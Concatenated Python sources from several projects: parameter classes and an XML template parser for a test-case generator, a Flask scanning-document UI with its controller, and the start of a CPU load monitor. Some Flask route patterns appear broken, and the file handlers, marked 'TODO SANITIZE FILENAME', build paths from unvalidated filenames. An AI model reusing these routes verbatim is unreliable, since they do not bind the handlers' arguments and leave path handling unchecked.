class Boolean_Parameter(Categorical_Parameter):
def __init__(self, n, d, v, w, nb):
"""
:param n : name
:param d : depth
:param v : values
:param w : weights
:param nb : nb_instances
"""
Categorical_Parameter.__init__(self, n, d, v, w, nb)
def _check_values(self, v):
pass
def set_value_i(self, i, val):
if not self._locks[i]:
if val == 'r':
self._values[i] = self._random_gen()
elif val in [True, "True", 1, "1"]:
self._values[i] = True
            elif val in [False, "False", 0, "0"]:
self._values[i] = False
else:
misc.error("Boolean_Parameter::set_value_i() -> " + self._name + ": unknow value parameter \"" + val + "\"")
raise ValueError
def duplicate(self):
return Boolean_Parameter(self._name, self._depth, self._values_array, self._weights_array, self._nb_instances)
def get_type(self):
return "boolean"
def __repr__(self):
return misc.color("--- Boolean_Parameter ---", "yellow") + "\n" + Categorical_Parameter.__repr__(self)
###############################################################################
# --- String_Parameter ------------------------------------------------------ #
###############################################################################
class String_Parameter(Categorical_Parameter):
def __init__(self, n, d, v, w, nb):
"""
:param n : name
:param d : depth
:param v : an array that contains all possible values as a string
:param w : an array (int) that contains a weight corresponding to the associated value
:param nb : nb_instances
"""
Categorical_Parameter.__init__(self, n, d, v, w, nb)
def _check_values(self, v):
if not 1 <= len(v) <= SETTINGS.get("string_parameter_max_size"):
misc.error("Categorical_Parameter::__check_values() -> " + self._name + ": values array size is out of range [1 ;" + str(SETTINGS.get("string_parameter_max_size")) + "]")
raise ValueError
def set_value_i(self, i, val):
if not self._locks[i]:
if val == "r":
self._values[i] = self._random_gen()
elif val == "first":
self._values[i] = self._values_array[0]
elif val == "last":
self._values[i] = self._values_array[-1]
elif val == "wmin":
self._values[i] = self.__get_wmin()
elif val == "wmax":
self._values[i] = self.__get_wmax()
elif val in self._values_array:
self._values[i] = val
else:
misc.error("String_Parameter::set_value_i() -> " + self._name + ": invalid parameter: " + str(self._values_array))
raise NameError
def __get_wmin(self):
wmin = 999
wmin_index = 0
        for i, w in enumerate(self._weights_array):
if w < wmin:
wmin = w
wmin_index = i
return self._values_array[wmin_index]
def __get_wmax(self):
wmax = 0
wmax_index = 0
        for i, w in enumerate(self._weights_array):
if w > wmax:
wmax = w
wmax_index = i
return self._values_array[wmax_index]
def duplicate(self):
return String_Parameter(self._name, self._depth, self._values_array, self._weights_array, self._nb_instances)
def get_type(self):
return "string"
def __repr__(self):
return misc.color("--- String_Parameter ---", "yellow") + "\n" + Categorical_Parameter.__repr__(self)
###############################################################################
# --- Numerical_Parameter --------------------------------------------------- #
###############################################################################
class Numerical_Parameter(Parameter):
def __init__(self, n, d, m, M, dis, mea, var, r, w, nb):
"""
:param n : name
:param d : depth
:param m : min value
:param M : max value
:param dis : distribution -> "u" for a uniform | "n" for a normal | i for an interval
:param mea : mean
:param var : variance
:param r : ranges
:param w : weights
:param nb : nb_instances
"""
Parameter.__init__(self, n, d, nb)
self._min = m
self._max = M
self._check_min_max_order()
self._mean = None
self._variance = None
self._ranges = None
self._intervals = None
self.__check_distribution(dis)
self._distribution = dis
self.__set_mean_and_variance(mea, var)
self.__check_ranges(r)
self._ranges = r
self.__set_intervals(r, w)
def __check_distribution(self, dis):
if dis not in ["u", "n", "i"]:
misc.error("Numerical_Parameter::__check_distribution() -> " + self._name + ": invalid distribution [\"u\", \"n\" ,\"i\"]")
raise NameError
def _check_min_max_order(self):
if self._min > self._max:
misc.error("Numerical_Parameter::__check_min_max_order() -> " + self._name + ": max value should be greater than min value")
raise ValueError
def _check_value(self, val):
if not self._min <= val <= self._max:
misc.error("Numerical_Parameter::_check_value() -> " + self._name + ": value parameter out of range[" + str(self._min) + ";" + str(self._max) + "]")
raise ValueError
def __check_ranges(self, ranges):
if ranges:
for r in ranges:
for i in range(2):
if not self._min <= r[i] <= self._max:
misc.error("Numerical_Parameter::_check_ranges() -> " + self._name + ": invalid range value [" + str(self._min) + ";" + str(self._max) + "]")
raise ValueError
if r[1] < r[0]:
misc.error("Numerical_Parameter::_check_ranges() -> " + self._name + ": invalid range value [" + str(self._min) + ";" + str(self._max) + "]")
raise ValueError
def __set_mean_and_variance(self, mea, var):
if mea is None and var is None:
self._mean = round((self._max + self._min)/2.0, 5)
self._variance = round((self._max - self._min)/4.0, 5)
else:
if not self._min <= mea <= self._max:
misc.error("Numerical_Parameter::__set_mean_and_variance() -> " + self._name + ": mean value must be between min and max")
raise ValueError
self._mean = round(mea, 5)
if var < 0:
misc.error("Numerical_Parameter::__set_mean_and_variance() -> " + self._name + ": variance value must be positive or null")
raise ValueError
self._variance = round(var, 5)
def __set_intervals(self, r, w):
if r:
v = []
for i in range(len(r)):
v.append(str(i))
self._intervals = String_Parameter("interval", -1, v, w, 1)
def _random_gen(self):
if self._distribution == "u":
val = (self._max - self._min)*np.random.rand() + self._min
elif self._distribution == "n":
if self._variance == 0:
val = self._mean
else:
val = np.random.normal(self._mean, self._variance, 1)[0]
while not self._min <= val <= self._max:
val = np.random.normal(self._mean, self._variance, 1)[0]
else:
self._intervals.set_value_i(0, "r")
index = int(self._intervals.values[0])
val = (self._ranges[index][1] - self._ranges[index][0])*np.random.rand() + self._ranges[index][0]
return val
def set_value_i(self, i, val):
if val == "r":
self._values[i] = self._random_gen()
return True
elif val == "min":
self._values[i] = self._min
return True
elif val == "max":
self._values[i] = self._max
return True
elif val == "mean":
self._values[i] = self._mean
return True
else:
return False
def __repr__(self):
return Parameter.__repr__(self) +\
"\nmin: " + str(self._min) +\
"\nmax: " + str(self._max) +\
"\ngenerator: " + str(self._distribution) +\
"\nmean: " + str(self._mean) +\
"\nvariance: " + str(self._variance) +\
"\nranges: " + str(self._ranges) + \
"\nweights: " + str(self.get_weights())
def get_m(self):
return self._min
m = property(get_m)
def get_M(self):
return self._max
M = property(get_M)
def get_distribution(self):
return self._distribution
distribution = property(get_distribution)
def get_mean(self):
return self._mean
mean = property(get_mean)
def get_variance(self):
return self._variance
variance = property(get_variance)
def get_ranges(self):
return self._ranges
ranges = property(get_ranges)
def get_weights(self):
w = []
if self._intervals:
w = self._intervals.weights_array
return w
weights = property(get_weights)
###############################################################################
# --- Integer_Parameter ----------------------------------------------------- #
###############################################################################
class Integer_Parameter(Numerical_Parameter):
def __init__(self, n, d, m, M, dis, mea, var, r, w, nb):
"""
:param n : name
:param d : depth
:param m : min value
:param M : max value
:param dis : distribution -> "u" for a uniform | "n" for a normal | i for an interval
:param mea : mean
:param var : variance
:param r : ranges
:param w : weights
:param nb : nb_instances
"""
Numerical_Parameter.__init__(self, n, d, m, M, dis, mea, var, r, w, nb)
def _random_gen(self):
return int(round(super(Integer_Parameter, self)._random_gen(), 0))
def set_value_i(self, i, val):
if not self._locks[i] and not super(Integer_Parameter, self).set_value_i(i, val):
if misc.check_integer(val):
val = int(val)
self._check_value(val)
self._values[i] = val
else:
misc.error("Integer_Parameter::set_value_i() -> " + self._name + ": string value parameter unknown")
raise NameError
def duplicate(self):
return Integer_Parameter(self._name, self._depth, self._min, self._max, self._distribution, self._mean, self._variance, self._ranges, self.get_weights(), self._nb_instances)
def reduce_interval(self, m):
if self._min <= m <= self._max:
self._min = m
elif m > self._max:
misc.error("Integer_Parameter::reduce_interval() -> " + self._name + ": new minimal number of instances is out of range")
raise ValueError
def get_type(self):
return "integer"
def __repr__(self):
return misc.color("--- Integer_Parameter ---", "yellow") + "\n" + Numerical_Parameter.__repr__(self)
###############################################################################
# --- Real_Parameter -------------------------------------------------------- #
###############################################################################
class Real_Parameter(Numerical_Parameter):
def __init__(self, n, d, m, M, dis, mea, var, r, w, nb):
"""
:param n : name
:param d : depth
:param m : min value
:param M : max value
:param dis : distribution -> "u" for a uniform | "n" for a normal | i for an interval
:param mea : mean
:param var : variance
:param r : ranges
:param w : weights
:param nb : nb_instances
"""
Numerical_Parameter.__init__(self, n, d, m, M, dis, mea, var, r, w, nb)
def _random_gen(self):
return round(super(Real_Parameter, self)._random_gen(), 5)
def set_value_i(self, i, val):
if not self._locks[i] and not super(Real_Parameter, self).set_value_i(i, val):
if misc.check_number(val):
val = round(float(val), 5)
self._check_value(val)
self._values[i] = val
else:
misc.error("Real_Parameter::set_value_i() -> " + self._name + ": string value parameter unknown")
raise NameError
def duplicate(self):
return Real_Parameter(self._name, self._depth, self._min, self._max, self._distribution, self._mean, self._variance, self._ranges, self.get_weights(), self._nb_instances)
def get_type(self):
return "real"
def __repr__(self):
return misc.color("--- Real_Parameter ---", "yellow") + "\n" + Numerical_Parameter.__repr__(self)
```
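A minimal usage sketch for the classes above, assuming the project's `Element`, `Miscellaneous` and `SETTINGS` modules resolve; the parameter names, values and weights are invented.
```python
from Parameter import String_Parameter, Integer_Parameter
# Three instances of a weighted categorical parameter ("red" twice as likely as the others).
color = String_Parameter("color", 0, ["red", "green", "blue"], [2, 1, 1], 3)
color.set_all_values("r")     # draw all three instances at random
color.lock_i(0)               # freeze instance 0 ...
color.set_value_i(0, "blue")  # ... so this later assignment is silently ignored
print(color.values)
# One instance of an integer drawn uniformly in [1, 10].
count = Integer_Parameter("count", 0, 1, 10, "u", None, None, None, None, 1)
count.set_value_i(0, "r")
print(count.values)
```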
#### File: XXX/src/Xml.py
```python
import xml.etree.ElementTree as ET
import Miscellaneous as misc
from Node import Node
from Parameter import Boolean_Parameter, String_Parameter, Integer_Parameter, Real_Parameter
from Constraint import Constraint
def parse_xml(path):
try:
tree = ET.parse(path)
return tree.getroot()
except ET.ParseError:
misc.error("Xml::parse_xml() -> the template \"" + path + "\" does not respect xml format")
return None
def read_template(path):
root_xml = parse_xml(path)
if root_xml is None:
raise ValueError
if root_xml.tag != "root":
misc.error("Xml::read_xml() -> the template root tag must be \"root\"" + path + "\"")
raise ValueError
name = check_attribute(root_xml, "name", True)
nb_instances = Integer_Parameter(name + "_nb_instances", -1, 1, 1, "u", None, None, None, None, 1)
nb_instances.set_value_i(0, 1)
nb_instances.lock_i(0)
root_node = Node(name, 0, None, None, nb_instances)
read_node(root_xml, root_node)
return root_node
def read_node(node_xml, node, d=0):
for child in node_xml:
name = check_attribute(child, "name", True)
if child.tag == "parameter":
node.add_parameter(build_parameter(name, d, child))
elif child.tag == "constraint":
node.add_constraint(build_constraint(name, d, node, child))
elif child.tag == "node":
node.add_child(build_node(name, d+1, node, child))
read_node(child, node.get_child_n(name), d+1)
else:
misc.error("Xml::read_node() -> \"" + child.tag + "\" unknown xml tag")
raise NameError
def build_node(n, d, p, node_xml):
minimum = check_attribute(node_xml, "min")
maximum = check_attribute(node_xml, "max")
nb = check_attribute(node_xml, "nb_instances")
if nb and check_nb_instances(nb):
nb = int(nb)
if minimum is not None or maximum is not None:
misc.error("Xml::build_node() -> \"" + n + "\" min and max should not be specified along with nb_instances attribute")
raise ValueError
node_xml.attrib["min"] = nb
node_xml.attrib["max"] = nb
nb_instances = build_integer_parameter(n + "_nb_instances", d-1, node_xml, 1)
nb_instances.set_value_i(0, nb)
nb_instances.lock_i(0)
elif minimum is not None or maximum is not None:
if minimum is None and maximum is not None:
misc.error("Xml::build_node() -> \"" + n + "\" missing min attribute")
raise ValueError
elif maximum is None and minimum is not None:
misc.error("Xml::build_node() -> \"" + n + "\" missing max attribute")
raise ValueError
nb_instances = build_integer_parameter(n + "_nb_instances", d-1, node_xml, 1)
if nb_instances.m < 0:
misc.error("Xml::build_node() -> \"" + n + "\" min and max attributes must be positive integers")
raise ValueError
else: #not nb_instances and not minimum and not maximum
node_xml.attrib["min"] = "1"
node_xml.attrib["max"] = "1"
nb_instances = build_integer_parameter(n + "_nb_instances", d-1, node_xml, 1)
nb_instances.set_value_i(0, 1)
nb_instances.lock_i(0)
return Node(n, d, p, None, nb_instances)
def build_parameter(n, d, node_xml):
parameter_type = check_attribute(node_xml, "type", True)
nbi = check_attribute(node_xml, "nb_instances")
to_lock = False
if nbi and check_nb_instances(nbi):
nbi = int(nbi)
to_lock = True
else:
nbi = 1
if parameter_type == "boolean":
p = build_boolean_parameter(n, d, node_xml, nbi)
elif parameter_type == "string":
p = build_string_parameter(n, d, node_xml, nbi)
elif parameter_type == "integer":
p = build_integer_parameter(n, d, node_xml, nbi)
elif parameter_type == "real":
p = build_real_parameter(n, d, node_xml, nbi)
else:
misc.error("Xml::build_parameter() -> \"" + parameter_type + "\" unknown parameter type")
raise NameError
if to_lock:
p.lock_nb_instances()
return p
def build_categorical_parameter(node_xml):
values = []
tmp = check_attribute(node_xml, "values", False)
if tmp:
tmp = tmp.split(";")
for v in tmp:
values.append(misc.remove_starting_and_ending_space(v))
else:
values = [True, False]
return values, build_weights(check_attribute(node_xml, "weights", False))
def build_weights(str_weights):
weights = []
if str_weights:
str_weights = str_weights.split(";")
for w in str_weights:
w = misc.remove_starting_and_ending_space(w)
if misc.check_integer(w, True):
w = int(w)
if w >= 0:
weights.append(int(w))
else:
misc.error("Xml::build_weights() -> weight must be positive or null")
if sum(weights) == 0:
misc.error("Xml::build_weights() -> at least one weight must be positive")
raise ValueError
return weights
def build_boolean_parameter(n, d, node_xml, nbi):
values, weights = build_categorical_parameter(node_xml)
if len(values) != 2:
misc.error("Xml::build_boolean_parameter() -> wrong boolean parameter values")
raise ValueError
for i in range(2):
if values[i] in [True, "True", "true", 1]:
values[i] = True
elif values[i] in [False, "False", "false", "0"]:
values[i] = False
else:
misc.error("Xml::build_boolean_parameter() -> wrong boolean parameter values")
raise ValueError
return Boolean_Parameter(n, d, values, weights, nbi)
def build_string_parameter(n, d, node_xml, nbi):
values, weights = build_categorical_parameter(node_xml)
return String_Parameter(n, d, values, weights, nbi)
def build_numerical_parameter(node_xml):
minimum = check_attribute(node_xml, "min", True)
maximum = check_attribute(node_xml, "max", True)
distribution = check_attribute(node_xml, "distribution")
mean = check_attribute(node_xml, "mean", False)
variance = check_attribute(node_xml, "variance", False)
ranges = []
if not distribution:
distribution = "u"
if mean and misc.check_number(mean, True):
mean = float(mean)
else:
mean = None
if variance and misc.check_number(variance, True):
variance = float(variance)
else:
variance = None
tmp = check_attribute(node_xml, "ranges", False)
if tmp:
tmp = tmp.split(";")
for r in tmp:
r = misc.remove_starting_and_ending_space(r)
r = r[1:-1].split(",")
if len(r) != 2:
misc.error("Xml::build_numerical_parameter() -> invalid ranges")
raise ValueError
for i in range(2):
r[i] = misc.remove_starting_and_ending_space(r[i])
ranges.append((r[0], r[1]))
return minimum, maximum, distribution, mean, variance, ranges, build_weights(check_attribute(node_xml, "weights", False))
def build_integer_parameter(n, d, node_xml, nbi):
minimum, maximum, distribution, mean, variance, str_ranges, weights = build_numerical_parameter(node_xml)
misc.check_integer(minimum, True)
minimum = int(minimum)
misc.check_integer(maximum, True)
maximum = int(maximum)
ranges = []
for r in str_ranges:
if misc.check_integer(r[0], True) and misc.check_integer(r[1], True):
ranges.append((int(r[0]), int(r[1])))
return Integer_Parameter(n, d, minimum, maximum, distribution, mean, variance, ranges, weights, nbi)
def build_real_parameter(n, d, node_xml, nbi):
minimum, maximum, distribution, mean, variance, str_ranges, weights = build_numerical_parameter(node_xml)
misc.check_number(minimum, True)
minimum = float(minimum)
misc.check_number(maximum, True)
maximum = float(maximum)
ranges = []
for r in str_ranges:
if misc.check_number(r[0], True) and misc.check_number(r[1], True):
ranges.append((float(r[0]), float(r[1])))
return Real_Parameter(n, d, minimum, maximum, distribution, mean, variance, ranges, weights, nbi)
def build_constraint(n, d, node, node_xml):
expressions = []
raw_expressions = check_attribute(node_xml, "expressions", True)
raw_expressions = raw_expressions.split(";")
for e in raw_expressions:
expressions.append(misc.remove_starting_and_ending_space(e))
types = []
raw_constraint_types = check_attribute(node_xml, "types", False)
if raw_constraint_types is not None:
raw_constraint_types = raw_constraint_types.split(";")
for c in raw_constraint_types:
c = misc.remove_starting_and_ending_space(c)
if c in ["forall", "exist", "unique"]:
types.append(c)
else:
misc.error("Xml::__build_constraint() -> unknown constraint type \"" + c + "\"")
raise NameError
quantifiers = []
raw_quantifiers = check_attribute(node_xml, "quantifiers", False)
if raw_quantifiers is not None:
raw_quantifiers = raw_quantifiers.split(";")
for l in raw_quantifiers:
l = misc.remove_starting_and_ending_space(l)
if misc.check_letter(l, True):
quantifiers.append(l)
ranges = []
raw_ranges = check_attribute(node_xml, "ranges", False)
if raw_ranges is not None:
raw_ranges = raw_ranges.split(";")
for r in raw_ranges:
r = misc.remove_starting_and_ending_space(r)
if r == "all":
ranges.append(r)
            elif r[0] == "[" and r[-1] == "]":
boundaries = r[1:-1].split(",")
if len(boundaries) != 2:
misc.error("Xml::build_constraint() -> wrong ranges syntax")
raise ValueError
ranges.append((misc.remove_starting_and_ending_space(boundaries[0]), misc.remove_starting_and_ending_space(boundaries[1])))
else:
misc.error("Xml::build_constraint() -> wrong ranges syntax")
raise ValueError
if len(quantifiers) != len(ranges) or len(quantifiers) != len(types):
misc.error("Xml::build_constraint() -> the number of quantifiers must equal the number of ranges and types")
raise ValueError
return Constraint(n, d, node, expressions, types, quantifiers, ranges)
def check_nb_instances(nb):
misc.check_integer(nb, True)
if int(nb) >= 0:
return True
else:
misc.error("Xml::check_nb_instances() -> nb_instances must be a positive integer value")
raise ValueError
def check_attribute(node_xml, att, err=False):
if att in node_xml.attrib:
return node_xml.attrib[att]
else:
if err:
misc.error("Xml::check_attribute() -> \"" + att + "\" attribute is missing")
raise NameError
else:
return None
def write_test_case(root_node, seed, path):
with open(path, "w") as f:
f.write("<?xml version=\"1.0\"?>\n\n")
f.write(write_root_node(root_node, seed))
def write_root_node(root_node, seed):
s = "<root name=\"" + root_node.name + "\">\n"
s +="\t<seed value =\"" + seed + "\"/>\n"
current_container = root_node.get_container_i(0)
s += write_data(current_container)
s += "</root>"
return s
def write_node(node, tab):
s = ""
for i in range(node.nb_instances):
s += tab + "<node name=\"" + node.name + "\" instance=\"" + str(i) + "/" + str(node.nb_instances - 1) + "\">\n"
current_container = node.get_container_i(i)
s += write_data(current_container, tab)
s += tab + "</node>\n"
return s
def write_data(current_container, tab=""):
s = ""
for p in current_container.parameters:
tmp_param = current_container.get_parameter_n(p)
values = ""
for i in range(tmp_param.nb_instances):
values += str(tmp_param.values[i]) + ";"
values = values[:-1]
s += tab + "\t<parameter name=\"" + p + "\" values=\"" + values + "\"/>\n"
for c in current_container.children:
s += write_node(current_container.get_child_n(c), tab + "\t")
return s
def read_test_case(path, root_node):
root_xml = parse_xml(path)
seed = "r"
if root_node.name == root_xml.attrib["name"]:
if root_xml[0].tag == "seed":
if root_xml[0].attrib["value"]:
seed = root_xml[0].attrib["value"]
root_xml.remove(root_xml[0])
else:
misc.error("Xml::read_template() -> seed value is missing")
raise ValueError
else:
misc.error("Xml::read_genotype() -> node name does not match")
raise ValueError
set_element(root_xml, root_node)
return seed
def set_element(node_xml, node, i=0):
for child in node_xml:
name = check_attribute(child, "name", True)
if child.tag == "parameter":
set_parameter(name, child, node, i)
elif child.tag == "node":
set_node(name, child, node, i)
else:
misc.error("Xml::set_element() -> unknown xml tag\"" + child.tag + "\"")
raise NameError
def set_parameter(name, node_xml, node, i):
if name in node.parameters:
param = node.get_parameter_n(name, i)
values = check_attribute(node_xml, "values", True).split(";")
length = len(values)
param.change_nb_instances(length)
for i in range(length):
if not values[i] in ["r", ""]:
param.set_value_i(i, misc.remove_starting_and_ending_space(values[i]))
param.lock_i(i)
else:
misc.error("Xml::set_parameter() -> parameter name \"" + name + "\" does not match")
raise NameError
def set_node(name, node_xml, node, i):
if name in node.children:
elem = node.get_child_n(name, i)
raw_identifier = check_attribute(node_xml, "instance")
if raw_identifier is None:
raw_identifier = "0"
identifier = raw_identifier.split("/")[0]
if misc.check_integer(identifier, True):
identifier = int(identifier)
if "/" in raw_identifier:
max_identifier = raw_identifier.split("/")[1]
if misc.check_integer(max_identifier, True):
max_identifier = int(max_identifier)
if not elem.nb_instances_lock:
elem.change_nb_instances(max_identifier + 1)
elem.lock_nb_instances()
if elem.nb_instances is None or identifier + 1 > elem.nb_instances:
elem.change_nb_instances(identifier + 1)
set_element(node_xml, elem, identifier)
if not elem.nb_instances_lock:
elem.reduce_nb_instances_interval(identifier)
else:
set_element(node_xml, elem, identifier)
``` |
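For reference, a hypothetical template accepted by `read_template()`. The element and attribute names mirror what the parser above looks for (`root`, `node`, `parameter`, `type`, `min`/`max`, `values`, `weights`, `distribution`, `mean`, `variance`); the concrete names and values are invented.
```python
template = """<?xml version="1.0"?>
<root name="library">
    <parameter name="open" type="boolean" values="true;false" weights="3;1"/>
    <node name="book" min="1" max="5">
        <parameter name="pages" type="integer" min="10" max="500" distribution="n" mean="120" variance="40"/>
        <parameter name="genre" type="string" values="novel;essay;poetry"/>
    </node>
</root>
"""
with open("template.xml", "w") as f:
    f.write(template)
root_node = read_template("template.xml")   # builds the Node/Parameter tree used by write_test_case()
```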
{
"source": "johndoe31415/bulkscan",
"score": 3
} |
#### File: johndoe31415/bulkscan/FriendlyArgumentParser.py
```python
import sys
import argparse
import textwrap
class FriendlyArgumentParser(argparse.ArgumentParser):
def __init__(self, *args, **kwargs):
argparse.ArgumentParser.__init__(self, *args, **kwargs)
self.__silent_error = False
def setsilenterror(self, silenterror):
self.__silent_error = silenterror
def error(self, msg):
if self.__silent_error:
raise Exception(msg)
else:
for line in textwrap.wrap("Error: %s" % (msg), subsequent_indent = " "):
print(line, file = sys.stderr)
print(file = sys.stderr)
self.print_help(file = sys.stderr)
sys.exit(1)
def baseint(value, default_base = 10):
if value.lower().startswith("0x"):
return int(value, 16)
elif value.lower().startswith("0b"):
return int(value, 2)
elif value.lower().startswith("0o"):
return int(value, 8)
elif value.lower().startswith("0b"):
return int(value, 2)
else:
return int(value, default_base)
if __name__ == "__main__":
parser = FriendlyArgumentParser()
parser.add_argument("-d", "--dbfile", metavar = "filename", type = str, default = "mydb.sqlite", help = "Specifies database file to use. Defaults to %(default)s.")
parser.add_argument("-f", "--force", action = "store_true", help = "Do not ask for confirmation")
parser.add_argument("-x", metavar = "hexint", type = baseint, default = "0x100", help = "Defaults to %(default)s.")
parser.add_argument("qids", metavar = "qid", type = int, nargs = "+", help = "Question ID(s) of the question(s) to be edited")
args = parser.parse_args(sys.argv[1:])
print(args)
```
#### File: bulkscan/scanui/Controller.py
```python
import os
import time
import re
import json
import uuid
import subprocess
import contextlib
import tempfile
import shutil
import doclib
import datetime
from .AutocompleteDB import AutocompleteDB
class Controller():
def __init__(self, app):
self._app = app
self._config = None
self._basedir = os.path.dirname(__file__)
self._acdb = None
self._doclib = doclib.DocLibrary()
def _late_init(self):
# Now config is available
with contextlib.suppress(FileExistsError):
os.makedirs(self._config["thumb_dir"])
with contextlib.suppress(FileExistsError):
os.makedirs(self._config["trash_dir"])
with contextlib.suppress(FileExistsError):
os.makedirs(self._config["doc_dir"])
with contextlib.suppress(FileExistsError):
os.makedirs(self._config["processed_dir"])
self._acdb = AutocompleteDB(self._config["autocomplete_config"])
self._doclib.add_directory(self._config["doc_dir"])
@property
def config(self):
return self._config
@property
def acdb(self):
return self._acdb
def set_config(self, config):
self._config = config
self._late_init()
@property
def staticdir(self):
return self._basedir + "/static"
def list_incoming(self):
incoming_files = [ filename for filename in os.listdir(self._config["incoming_dir"]) if filename.endswith(".png") ]
incoming_files.sort()
return incoming_files
def rotate(self, filename, degrees):
input_filename = self._config["incoming_dir"] + "/" + filename
with tempfile.NamedTemporaryFile(suffix = ".png", delete = False) as outfile:
subprocess.check_call([ "convert", "-rotate", str(degrees), input_filename, outfile.name ])
shutil.move(outfile.name, input_filename)
self.remove_thumb(filename)
@staticmethod
def _sanitize_filename(filename):
filename = filename.replace("/", " ")
filename = filename.replace("\"", " ")
filename = filename.replace("'", " ")
filename = filename.replace("&", "+")
filename = re.sub(r"\s+", "_", filename)
return filename
def _find_filename(self, dirname, filename):
for i in range(1000):
if i == 0:
result_filename = self._sanitize_filename(filename)
else:
(prefix, extension) = os.path.splitext(filename)
result_filename = self._sanitize_filename(prefix + "_%03d" % (i) + extension)
full_filename = dirname + "/" + result_filename
if not os.path.exists(full_filename):
return full_filename
return None
def _delete_file(self, src_filename):
return self._move_file(src_filename, self._config["trash_dir"])
def _move_file(self, src_filename, target_dir):
dst_filename = self._find_filename(target_dir, os.path.basename(src_filename))
if dst_filename is not None:
os.rename(src_filename, dst_filename)
return dst_filename is not None
def delete_incoming(self, filelist):
return { filename: self._delete_file(self._config["incoming_dir"] + "/" + filename) for filename in filelist }
def get_thumb_filename_for(self, filename):
thumb_filename = self._config["thumb_dir"] + "/" + filename
if thumb_filename.endswith(".png"):
thumb_filename = thumb_filename[:-3] + "jpg"
return thumb_filename
def remove_thumb(self, filename):
with contextlib.suppress(FileNotFoundError):
os.unlink(self.get_thumb_filename_for(filename))
def get_thumb(self, filename):
thumb_filename = self.get_thumb_filename_for(filename)
if not os.path.isfile(thumb_filename):
src_filename = self._config["incoming_dir"] + "/" + filename
subprocess.check_call([ "convert", "-quality", "80", "-resize", "200x300", src_filename, thumb_filename ])
return os.path.basename(thumb_filename)
def create_document(self, filenames, tags = None, attributes = None):
if tags is None:
tags = [ ]
if attributes is None:
attributes = { }
attributes = { key: value for (key, value) in attributes.items() if (value is not None) }
fn_elements = [ ]
if "docdate" in attributes:
fn_elements.append(attributes["docdate"].split(":")[1])
if "peer" in attributes:
fn_elements.append(attributes["peer"].replace(" ", "_"))
if "docname" in attributes:
fn_elements.append(attributes["docname"].replace(" ", "_"))
self.acdb.put_peer_docname(attributes.get("peer"), attributes.get("docname"))
self.acdb.put_tags(tags)
self.acdb.write()
output_doc = self._find_filename(self._config["doc_dir"], "-".join(fn_elements) + ".mud")
with doclib.MultiDoc(output_doc) as doc:
for filename in filenames:
full_filename = self._config["incoming_dir"] + "/" + filename
try:
meta = doclib.MetaReader(full_filename).read()
except doclib.MetaReaderException:
meta = { }
side_uuid = doc.add(full_filename, side_uuid = meta.get("side_uuid"), sheet_uuid = meta.get("page_uuid"), sheet_side = meta.get("side", "front"))
doc.set_side_property(side_uuid, "orig_filename", filename)
for attribute in [ "batch_uuid", "created_utc", "scanned_page_no" ]:
if attribute in meta:
doc.set_side_property(side_uuid, attribute, str(meta[attribute]))
doc.set_document_property("doc_uuid", str(uuid.uuid4()))
doc.set_document_property("created_utc", datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ"))
for (key, value) in attributes.items():
doc.set_document_property(key, value)
for tag in tags:
doc.add_tag(tag)
for filename in filenames:
self._move_file(self._config["incoming_dir"] + "/" + filename, self._config["processed_dir"])
return { "success": True }
def list_documents(self):
return { doc_uuid: doc_entry.metadata for (doc_uuid, doc_entry) in self._doclib }
```
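The filename handling in `Controller` is the interesting part: `_sanitize_filename` normalises user-supplied names and `_find_filename` then probes the target directory, appending `_001`, `_002`, … before the extension and giving up after 1000 attempts. A minimal sketch of the sanitiser (the inputs are illustrative; it is a `@staticmethod`, so no configuration is needed):

```python
# Illustrative inputs; slashes and quotes become spaces, "&" becomes "+",
# and any whitespace run collapses to a single underscore.
assert Controller._sanitize_filename("tax return 2021.pdf") == "tax_return_2021.pdf"
assert Controller._sanitize_filename('a/b & "c".png') == "a_b_+_c_.png"
```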
#### File: bulkscan/scanui/__init__.py
```python
import os
import json
from flask import Flask, send_file, send_from_directory, jsonify, request, abort, redirect
from .Controller import Controller
from .Debug import Debug
app = Flask(__name__)
ctrlr = Controller(app)
dbg = Debug()
@app.route("/")
def index():
return redirect("/static/html/incoming.html")
@app.route("/incoming/list")
def incoming_list():
return jsonify(ctrlr.list_incoming())
# TODO SANITIZE FILENAME
@app.route("/incoming/thumb/#")
def incoming_thumb(filename):
thumb_filename = ctrlr.get_thumb(filename)
if thumb_filename is None:
# No such file or directory
abort(404)
return send_from_directory(ctrlr.config["thumb_dir"], thumb_filename, cache_timeout = 0)
@app.route("/incoming", methods = [ "DELETE" ])
def incoming_delete():
return jsonify(ctrlr.delete_incoming(request.json))
# TODO SANITIZE FILENAME
@app.route("/incoming/action/<action>/#", methods = [ "POST" ])
def incoming_action(action, filename):
if action == "rot90":
ctrlr.rotate(filename, 90)
elif action == "rot180":
ctrlr.rotate(filename, 180)
elif action == "rot270":
ctrlr.rotate(filename, 270)
else:
abort(400)
return jsonify({ "status": "OK" })
# TODO SANITIZE FILENAME
@app.route("/incoming/image/#")
def incoming_image(filename):
return send_from_directory(ctrlr.config["incoming_dir"], filename, cache_timeout = 0)
@app.route("/autocompletion")
def autocompletion():
return jsonify(ctrlr.acdb.get_all())
@app.route("/document", methods = [ "POST" ])
def document_create():
indata = request.json
return jsonify(ctrlr.create_document(indata["files"], indata["tags"], indata["attrs"]))
@app.route("/document")
def document_list():
return jsonify(ctrlr.list_documents())
@app.route("/debug")
def debug():
return jsonify(dbg.get())
@app.route("/debug/long")
def debug_long():
dbg.long()
return "OK\n"
``` |
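The module above exposes a bare Flask app whose `Controller` only becomes usable once `set_config()` has been called. A minimal bootstrap sketch; all directory paths are placeholders and the config keys follow the ones referenced in `Controller._late_init` and the route handlers:

```python
# Hypothetical bootstrap script; every path below is a placeholder.
from scanui import app, ctrlr

ctrlr.set_config({
    "incoming_dir": "/srv/scan/incoming",
    "thumb_dir": "/srv/scan/thumbs",
    "trash_dir": "/srv/scan/trash",
    "doc_dir": "/srv/scan/docs",
    "processed_dir": "/srv/scan/processed",
    "autocomplete_config": "/srv/scan/autocomplete.json",
})
app.run(host="127.0.0.1", port=5000)
```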
{
"source": "johndoe31415/cpumontemp",
"score": 3
} |
#### File: johndoe31415/cpumontemp/cpumontemp.py
```python
import time
import datetime
import subprocess
import sys
class CPUMonitor(object):
_CYCLE_DURATION_SECONDS = 60
_FINAL_DURATION_SECONDS = 60
def __init__(self, sensorname):
self._sensorname = sensorname
self._outfile = None
self._t0 = None
self._workers = [ ]
def _spawn_worker(self):
self._workers.append(subprocess.Popen([ "dd", "if=/dev/urandom", "of=/dev/null", "bs=1M" ], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL))
